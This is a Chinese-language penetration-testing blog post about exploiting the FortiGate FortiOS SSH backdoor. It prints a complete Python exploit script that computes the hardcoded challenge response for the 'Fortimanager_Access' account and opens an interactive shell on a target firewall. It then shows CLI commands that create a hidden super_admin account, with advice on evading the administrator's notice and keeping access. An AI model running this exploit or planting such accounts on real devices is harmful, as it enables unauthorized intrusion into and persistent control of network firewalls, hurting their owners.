FortiGate 飞塔系统(FortiOS)SSH Backdoor 利用

渗透测试 2016-07-01 15:00 暂无评论

洞是年初的时候放出来的吧。一直没有关注测试,今天正好遇到了这个防火墙。payload 看一下

#!/usr/bin/env python
 
# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>
 
import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty
 
def custom_handler(title, instructions, prompt_list):
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]
 
 
def main():
    if len(sys.argv) < 2:
        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
        exit(-1)
 
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
    try:
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass
 
    trans = client.get_transport()
    try:
        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    except paramiko.ssh_exception.AuthenticationException:
        pass
 
    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    chan = client.invoke_shell()
 
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)
 
        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)
 
    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
 
 
if __name__ == '__main__':
    main()

看了一下开放端口有 22 意味着可以利用该洞。但是不清楚具体是否可以开启 VPN 所以不敢直接操作开启 VPN 项,遂看到有 WEB UI 界面,添加一个新的管理员帐号是最好的方法。(我能说我英文辣鸡嘛???

FG200 # config system admin

FG200 (admin) #
edit      add/edit a table value
delete    delete a table value
purge     clear all table value
rename    rename a table entry
move      move an ordered table value
clone     clone a table entry
get       get dynamic and system information
show      show configuration
end       end and save last config

FG200 (admin) # edit "test"
new entry 'test' added

FG200 (test) # set accprofile "super_admin"

FG200 (test) # set vdom "root"

FG200 (test) # set password "xxoo"

FG200 (test) # end

添加一个密码为 xxoo 的 test 帐号赋予 super_admin 权限,然后安然进入 WEB UI 避免修改 admin 用户密码被管理员发现,在渗透的时候拿到其他后门权限时及时将该帐号处理掉,毕竟防火墙管理员检查的比较多。

FortiOS Cli 命令行手册:http://docs.fortinet.com/d/fortigate-cli-reference-pdf

暂无评论